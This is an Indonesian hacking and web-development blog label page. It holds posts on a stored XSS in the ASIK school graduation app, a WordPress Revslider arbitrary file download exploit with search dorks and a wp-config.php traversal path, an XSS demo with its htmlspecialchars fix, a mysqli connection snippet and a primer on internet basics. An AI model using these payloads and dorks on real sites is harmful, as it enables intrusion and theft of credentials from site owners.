Tampilkan postingan dengan label Internet. Tampilkan semua postingan
Tampilkan postingan dengan label Internet. Tampilkan semua postingan
XSS Vulnerability pada Web ASIK (Aplikasi Sistem Informasi Kelulusan) - Hallo gaess dah lama nih enggak update artikel disini, kali ini saya bakal share Vulnerability/Kerentanan XSS (Cross Site Scripting) pada aplikasi ASIK (Aplikasi Sistem Informasi Kelulusan), Perlu anda ketahui ASIK bukan CMS melainkan aplikasi.

Sudah lama saya pengen share bug ini tapi baru sekarang aja inget buat update artikel disini, Bagaimana bug XSS bisa terjadi di aplikasi ASIK? XSS tersebut terjadi karena kurangnya filter pada aplikasi sehingga bisa menjalankan XSS (Cross Site Scripting).

Payload :

  • <script>alert("XSS");</script>


Langsung aja stepnya.


  1. Buka aplikasi/web ASIK.
  2. Klik "Hubungi Kami" nanti akan masuk ke halaman yg berisi form contact, url https://site.sch.id/index.php?page=contact
  3. Isi form tersebut seperti berikut, Nama Lengkap : "tes"; Email : "tes@tes.tes; Pesan : "payload".
  4.  Lalu klik "Kirim Pesan".
  5. Buka url https://site.sch.id/admin/hubungi.php.
  6. Jika payload berhasil akan muncul Alert "XSS".
Sekian saja artikel dari saya semoga bermanfaat, tolong gunakan ilmu ini dengan baik kamu bisa memberitahu webdev sekolah kamu jika web sekolah kamu menggunakan aplikasi ini.
Tools Reset Password Cpanel V.2 [ PHP ] - Hai gaess udah seminggu nih saya ga update artikel diblog ini dikarenakan sibuk :v dan sekarang lagi sempet aja bisa nulis artikel ini, di Artikel ini saya akan memberikan Tools Reset Password Cpanel V.2 versi PHP.

Sebenernya dah lama juga pengen update script tools ini, Tapi karena bingung kekurangan ide dan waktunya kurang ya jadi sekarang baru sempet dan walaupun tools ini ga bagus bagus amat wkwkwk.

Script V.1 => [KLIK]

Ingat script ini bukan 100% hasil codingan saya, di dalam script tools ini pun saya menggunakan script dari shell backdoor IndoXploit untuk server infonya.

Kelebihan tools ini :

  • Responsive ( enak dilihat,gak ribet buat dipake ).
  • Tersedia Info Server.
Screenshot ( LOCALHOST )

Script :





Script Connect Database PHP Mysqli - Saat saya mencoba menjalankan config dengan mysql php di mamp terjadi error karena mysql tidak dapat digunakan untuk php versi 5 keatas sedangkan mamp saya phpnya sudah versi 7 dan saya mendapat jawaban dari seseorang yang ada di forum IndoXploit Coders Team "Coba gunakan mysqli" ungkapnya, lalu langsung saya coba deh dan ternyata berhasil.

Jadi kesimpulannya mysqli dapat digunakan untuk php versi 5 keatas dan karena itu juga yang membuat saya ingin menulis artikel ini. Oke langsung aja comot scriptnya dibawah.

<?php
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = '';
$dbname = 'database_kita';
$connect = new mysqli($dbhost,$dbuser,$dbpass,$dbname);
if ($connect->connect_error) {
   die('Maaf koneksi gagal: '. $connect->connect_error);
}
?>


Sekian, semoga artikel ini bermanfaat :)
Naufal Ardhani - Halo sobat kali ini saya akan membahas Exploit Wordpress Revslider Arbritary File Download pada exploit ini anda dapat mendownload file file penting yang ada di dalam server web tersebut khususnya web yang menggunakan cms Wordpress tapi tidak semua web yang menggunakan cms tersebut rentan dengan exploit ini.

Menurut hasil yang saya dapatkan dari Exploit DB exploit ini ditemukan oleh Claudio Viviani pada tahun 2014, ia merupakan pemilik blog https://www.homelab.it/ yang berisi tentang security.



Dork :

  • inurl:wp-content/plugins/revslider/
  • inurl:revslider
  • inurl:revslider_admin.php
  • inurl:revslider_front.php
  • inurl:plugins/revslider/
  • intext:Powered by Revslider
  • intitle:"Index Of/ revslider"
  • intitle:"Index Of/wp-content/themes/revslider"
  • intitle:"Index Of/wp-content/plugins/revslider"
  • intitle:"Index Of/admin/revslider"
  • intitle:"Index Of/fr/revslider"
  • intitle:"Index Of/en/revslider"
  • intitle:"Index Of/us/revslider"
  • intitle:"Index Of/ar/revslider"
  • intitle:"Index Of/es/revslider"
  • intitle:"Index Of/de/revslider"
Exploit :
  • /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Step :
  1. Dorking dengan dork yang sudah disediakan.
  2. Disini saya sudah memiliki target yang vuln/rentan tinggal kasih exploit, contoh : http://site.co.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  3. Dan jika berhasil admin-ajax.php terdownload lalu buka dengan text editor.

Sekian saja Exploit Wordpress Revslider Arbitary File Download Vulnerability yang saya bagikan semoga bermanfaat dan saya tidak bertanggung atas apa yang anda lakukan terimakasih.


Naufal Ardhani - Di postingan sebelumnya saya sudah membuat artikel Pengertian XSS bagi yang belom tau apa itu XSS silahkan dibaca, Bagi seorang Web Developer sangat penting mengetahui hal seperti ini supaya keamanan websitenya terjaga dan kali ini saya akan memberikan contoh script  bagaimana terjadinya bug XSS dan cara mengatasi bug XSS.

Payload :

  • <script>alert(1)</script>
  • <script>alert("XSS!!!")</script>


Bagaimana XSS bisa terjadi? cek dibawah


Sebelum lanjut membaca siapkan terlebih dahulu localhost anda untuk menjalankan script XSS,

<?php 
   $url = $_GET["kata"]; 
   echo $url; 
?>


Script diatas merupakan script XSS yang terjadi pada url dan ini sangat simple tidak ada HTML ataupun CSS karena hanya untuk belajar saja hehe.


Simpan script xss dengan nama xss.php dan silahkan hidupkan localhost anda lalu buka script xss,

  • http://localhost:8888/xss.php (dihalaman ini kosong hehe)
  • dan untuk memunculkan text pada halaman tersebut anda tinggal tambahkan parameter ?kata= dan isinya, contoh : http://localhost:8888/xss.php?kata=naufalardhani.com ganti text berwarna biru dengan payload.
Nah itu adalah 2 hasil payload yang saya gunakan.

Lanjut kita bahas cara menambal bug XSS.

  • Tambahkan htmlspecialchars() seperti dibawah agar html tidak dapat berjalan dengan sempurna.
<?php 
   $url = $_GET["kata"]; 
   echo htmlspecialchars($url); 
?>


  • Lalu kita save dan jalankan.

Berhasil! script html sudah tidak berjalan karena sudah di filter dengan htmlspecialchars().


Terimakasih telah membaca Contoh Script Bug XSS dan Tutorial Patch Bug XSS di blog saya, semoga bermanfaat :)

Jika ada yang tidak dipahami silahkan tanya saja di kolom komentar.


Naufal Ardhani - Cross Site Scripting XSS adalah salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

Mengapa Cross Site Scripting disingkat XSS bukannya CSS? Karna Singkatan CSS sudah digunakan untuk cascade style sheet.


Bingung script XSS seperti apa? silahkan lihat DISINI.

Tipe XSS
  • Reflected
  • Stored


Reflected XSS
Reflected XSS merupakan tipe XSS yang paling umum dan yang paling mudah dilakukan oleh penyerang. Penyerang menggunakan social engineering agar tautan dengan kode berbahaya ini diklik oleh pengguna. Dengan cara ini penyerang bisa mendapatkan cookie pengguna yang bisa digunakan selanjutnya untuk membajak session pengguna.

Mekanisme pertahanan menghadapi serangan ini adalah dengan melakukan validasi input sebelum menampilkan data apapun yang di-generate oleh pengguna. Jangan percayai apapun data yang dikirim oleh pengguna.

Contoh penyerangan menggunakan XSS (Nama – nama yang saya pakai merupakan karangan) :

1. Toni sering mengunjungi website jack, yang di website tersebut memungkinkan toni untuk memasukan username/password dan menyimpan data pribadi atau data transaksi yang seharusnya tidak boleh diketahui orang lain.

2. Rey mengetahui bahwa toni sering mengunjungi web tersebut, dan lalu mengamati jika di website buatan Jack terdapat kerentanan atau celah yang bisa diserang menggunakan xss

3. Rey lalu mengekplore dan mencoba mencari celahnya dan membuat script berbahaya dan kemudian di embed atau dimasukan ke dalam sbuah URL

4. Rey lalu mengirim email ke toni yang berisi link ke halaman web jack yang sebenernya urlnya sudah di embed script yang berbahaya tersebut, serta merayunya dengan alasan palsu atau sejenisnya.

5. saat Toni click URL tersebut maka toni akan masuk ke dalam website jack serta script yang sudah rey buat akan dijalankan, sehingga rey bisa mengmbil data dari cookienya dan bisa memanfaatkanya.


Stored XSS
Stored XSS lebih jarang ditemui dan dampak serangannya lebih besar. Sebuah serangan stored XSS dapat berakibat pada seluruh pengguna. Stored XSS terjadi saat pengguna diizinkan untuk memasukkan data yang akan ditampilkan kembali. Contohnya adalah pada message board, buku tamu, dll. Penyerang memasukkan kode HTML atau client script code lainnya pada posting mereka.


Sekian saja artikel yang tentang pengertian XSS semoga ada dapat memahami dengan mudah dan jangan lupa berkomentar dibawah.

Referensi :
https://upyes.wordpress.com/2013/05/18/pengertian-xss/
https://en.wikipedia.org/wiki/Cross-site_scripting
Naufal Ardhani - Internet merupakan jaringan besar komputer yang menghubungkan jutaan computer di seluruh dunia.Internet memberikan akses informasi yang dimasukkan oleh orang per orang, perusahaan, dan organisasi. Internet juga dapat digunakana untuk bertukar informasi, mengirim pesan, dan membeli barang.




DASAR-DASAR INTERNET
Sebagian besar orang terhubung (log masuk) dengan Internet menggunakan perangkat lunak disebut penjelajah web (browser)
Struktur dasar internet disediakan oleh perusahaan telepon. Kabel dari perusahaan telepon membawa informasi yang kamu kirimkan dan diterima ketika menggunakan internet. Sebagian besar pengguna dirumah menggunakan penyedia jasa internet (internet service provider-ISP), untuk menyediakan akses ke Internet. Ketika terhubung dengan internet, pesan-pesan dari komputermu akan masuk ke kabel telepon menuju komputer-komputer kuat milik ISP. Komputer-komputer tersebut bekerja seperti kantor pos elektronik, yang secara otomatis memilah dan mengirim informasi dalam hitungan detik.

Menggunakan Internet:
1. Anda log masuk ke internet melalui kabel telepon.
2. Pesan yang kamu ketik di penjelajah web akan masuk ke ISP.
3. ISP kemudian akan mengirimkan pesan melalui sederetan computer kuat yang disebut perute atau penghala (routers).
4. Informasi diteruskan sampai mencapai computer yang memegang informasi atau disebut server.
5. Server akan mengirimkan informasi yang kamu minta kembali ke ISP melalui perute.
6. ISP akan mengirimkan informasi kembali ke komputermu melalui kabel telepon.

World Wide Web (WWW) merupakan jaringan laman web raksasa yang dapat diakses melalui internet.

WORLD WIDE WEB (WWW)
(dalam bahasa Indonesia, waring wera wanua) merupakan sumber informasi raksasa, arena jejaring social, dan tempat melaksanakan perdagangan elektronik. Jaringan tersebut berisi jutaan laman web. Setiap laman terbentuk dari dokumen-dokumen yang disebut laman web.

HTML
Dalam bahasa computer, laman web ditulis HyperText Markup Language (HTML). Jika kamu sedang melihat sebuah halaman web, kamu dapat melihat kode-kode tersebut dengan mengklik tombol “View” (lihat), kemudian dilanjutkan dengan memilih “Source”.

TAUTAN
Pada laman web, beberapa kata atau gambar ditampilkan lebih menonjol. Jika kita mengkik kata-kata tersebut, maka akan muncul halaman baru dengan informasi yang baru, atau diunduh. Tautan dapat membuat kita berpindah dengan cepat dari satu halaman ke halaman lain di seluruh laman web.

NAMA-NAMA INTERNET
Setiap potongan informasi internet memiliki alamat, yang disebut dengan Pelokasi Sumber Daya Seragam (Uniform Resource Locator URL). Sebuah URL dapat memanggil informasi yang sesuai dengan keinginanmu. Alamat tersebut juga mendefinisikan format (disebut protocol) dari pesan yang akan dikirim.

Sebaris URL
http://www.howstuffworks.com/web-server/htm
http:// adalah protocol, singkatan dari hypertext transfer protocol (protocol transfer hiperteks).
www.howstuffworks.com adalah domain (ranah) yang merupakan identitas dari laman web dan server tempat laman tersebut disimpan.
Web-server.htm: path file, yang merupakan nama dari berkas yang disimpan. .htm menunjukkan bahwa berkas tersebut ditulis dalam kode HTML.

DOT COM
Bagian terakhir dari sebuah nama domain disebut sebagai domain tingkat atas. Berikut ini beberapa contoh arti dari nama tersebut.
.com untuk organisasi komersil
.edu untuk sekolah atau lembaga pendidikan
.gov untuk lembaga pemerintahan
.org untuk organisasi nirlaba (seperti organisasi amal)
Beberapa nama domain memiliki dua huruf tambahan sebagai identitas Negara tempatnya berasal. Sebagai contoh:
.es untuk Negara spanyol
.th untuk Negara Thailand
.uk untuk Inggris Raya

SURAT ELEKTRONIK (EMAIL)
Surel atau surat elektronik (electronic mail,Email) merupakan salah satu cara komputermu mengirimkan pesan kepada pengguna internet lainnya. Kamu menulis dan membaca Email dengan menggunakan perangkat lunak pembaca surat elektronik, seperti Outlook Express. Yang dibuat oleh Microsoft. Surat elektronik dikirimkan dari kabel telepon ke ISP. Dari sana, surat elektronik kemudian dikirimkan ke ISP penerima melalui internet, ketika menunggu waktu pengiriman, yaitu saat penerima melakukan log masuk ke Internet.

PERDAGANGAN ELEKTRONIK
Internet juga dapat digunakan untuk membeli dan menjual barang. Hal tersebut dikenal dengan perdagangan elektronik (e-commerce). Barang dan jasa yang ditawarkan pada laman web dapat dipesan secara langsung dengan mengisi formulir pemesanan yang terdapat pada laman web. Perdagangan elektronik juga membuat orang dapat membeli apa pun, kapan pun, dan dari mana pun. Tetapi, hal tesebut bukan berarti kamu tidak dapat mengamati barang-barang atau mencobanya sebelum kamu membelinya.

MOBILE INTERNET
Internet juga dapat diakses oleh telepon seluler. Telepon dapat menampilkan laman web dengan protocol yang berbeda dengan gambar yang lebih sedikit. Laman-laman tesebut didesain lebih sederhana dibandingkan laman web biasa karena jaringan telepon selular membawa lebih sedikit informasi digital dibandingkan koneksi internet biasa. Sebagian besar telepon seluler juga dapat digunakan untuk mengirim surat elektronik.


Sekian Artikel Struktur Dasar Internet semoga bermanfaat :)